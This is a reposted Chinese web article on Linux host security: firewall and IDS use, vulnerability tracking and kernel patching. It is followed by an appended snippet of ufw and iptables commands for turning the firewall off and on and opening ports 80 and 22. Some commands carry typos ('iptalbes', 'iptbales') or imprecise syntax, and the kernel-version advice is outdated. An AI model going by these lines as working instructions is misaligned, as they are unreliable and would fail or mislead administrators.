上述這些問題都需要系統(tǒng)管理員隨時留意系統(tǒng)登錄的用戶狀況以及查看相應(yīng)日志文件，許多背離正常行為的蛛絲馬跡都應(yīng)當引起高度注意。 8、橫向擴展：綜合防御管理 防火墻、IDS等防護技術(shù)已經(jīng)成功地應(yīng)用到網(wǎng)絡(luò)安全的各個領(lǐng)域，而且都有非常成熟的產(chǎn)品。 在Linux系統(tǒng)來說，有一個自帶的Netfilter/Iptables防火墻框架，通過合理地配置其也能起到主機防火墻的功效。在Linux系統(tǒng)中也有相應(yīng)的輕量級的網(wǎng)絡(luò)入侵檢測系統(tǒng)Snort以及主機入侵檢測系統(tǒng)LIDS(Linux Intrusion Detection System)，使用它們可以快速、高效地進行防護。 需要提醒注意的是：在大多數(shù)的應(yīng)用情境下，我們需要綜合使用這兩項技術(shù)，因為防火墻相當于安全防護的第一層，它僅僅通過簡單地比較IP地址/端口對來過濾網(wǎng)絡(luò)流量，而IDS更加具體，它需要通過具體的數(shù)據(jù)包(部分或者全部)來過濾網(wǎng)絡(luò)流量，是安全防護的第二層。綜合使用它們，能夠做到互補，并且發(fā)揮各自的優(yōu)勢，最終實現(xiàn)綜合防御。 9、評測：漏洞追蹤及管理 Linux作為一種優(yōu)秀的開源軟件，其自身的發(fā)展也日新月異，同時，其存在的問題也會在日后的應(yīng)用中慢慢暴露出來。黑客對新技術(shù)的關(guān)注從一定程度上來說要高于我們防護人員，所以要想在網(wǎng)絡(luò)攻防的戰(zhàn)爭中處于有利地位，保護Linux系統(tǒng)的安全，就要求我們要保持高度的警惕性和對新技術(shù)的高度關(guān)注。用戶特別是使用Linux作為關(guān)鍵業(yè)務(wù)系統(tǒng)的系統(tǒng)管理員們，需要通過Linux的一些權(quán)威網(wǎng)站和論壇上盡快地獲取有關(guān)該系統(tǒng)的一些新技術(shù)以及一些新的系統(tǒng)漏洞的信息，進行漏洞掃描、滲透測試等系統(tǒng)化的相關(guān)配套工作，做到防范于未然，提早行動，在漏洞出現(xiàn)后甚至是出現(xiàn)前的最短時間內(nèi)封堵系統(tǒng)的漏洞，并且在實踐中不斷地提高安全防護的技能，這樣才是一個比較的解決辦法和出路。 10、保持更新：補丁管理 Linux作為一種優(yōu)秀的開源軟件，其穩(wěn)定性、安全性和可用性有極為可靠的保證，世界上的Linux高手共同維護著個優(yōu)秀的產(chǎn)品，因而起流通渠道很多，而且經(jīng)常有更新的程序和系統(tǒng)補丁出現(xiàn)，因此，為了加強系統(tǒng)安全，一定要經(jīng)常更新系統(tǒng)內(nèi)核。 Kernel是Linux操作系統(tǒng)的核心，它常駐內(nèi)存，用于加載操作系統(tǒng)的其他部分，并實現(xiàn)操作系統(tǒng)的基本功能。由于Kernel控制計算機和網(wǎng)絡(luò)的各種功能，因此，它的安全性對整個系統(tǒng)安全至關(guān)重要。早期的Kernel版本存在許多眾所周知的安全漏洞，而且也不太穩(wěn)定，只有2.0.x以上的版本才比較穩(wěn)定和安全(一般說來，內(nèi)核版本號為偶數(shù)的相對穩(wěn)定，而為奇數(shù)的則一般為測試版本，用戶們使用時要多留意)，新版本的運行效率也有很大改觀。在設(shè)定Kernel的功能時，只選擇必要的功能，千萬不要所有功能照單全收，否則會使Kernel變得很大，既占用系統(tǒng)資源，也給黑客留下可乘之機。 在Internet上常常有最新的安全修補程序，Linux系統(tǒng)管理員應(yīng)該消息靈通，經(jīng)常光顧安全新聞組，查閱新的修補程序。

linux防火墻關(guān)閉和開啟命令

Linux防火墻關(guān)閉和開啟命令：

關(guān)閉：sudo ufw disable

開啟：sudo ufw enable

拓展：Linux防火墻規(guī)則添加和刪除命令：

添加：sudo ufw allow port/protocol

刪除：sudo ufw delete port/protocol

Linux關(guān)閉防火墻幾種命令

Linux下打開和關(guān)閉防火墻

1.及時生效,重啟后復原

關(guān)閉:service iptables stop 開啟:service iptalbes start 查看狀態(tài):service iptables status(關(guān)閉狀態(tài)的話會提示firewal is not running)

2.非及時性生效,重啟后永久性生效

關(guān)閉:chkconfig iptbales off 開啟:chkconfig iptables on 查看狀態(tài):chkconfig iptables --list

在開啟了防火墻時，做如下設(shè)置，開啟相關(guān)端口，

修改/etc/sysconfig/iptables 文件，添加以下內(nèi)容：

-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT

-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT

分享標題：linux防范命令 linux攻防
網(wǎng)頁路徑：http://jinyejixie.com/article10/hpdpdo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供全網(wǎng)營銷推廣、標簽優(yōu)化、ChatGPT、企業(yè)網(wǎng)站制作、云服務(wù)器、響應(yīng)式網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)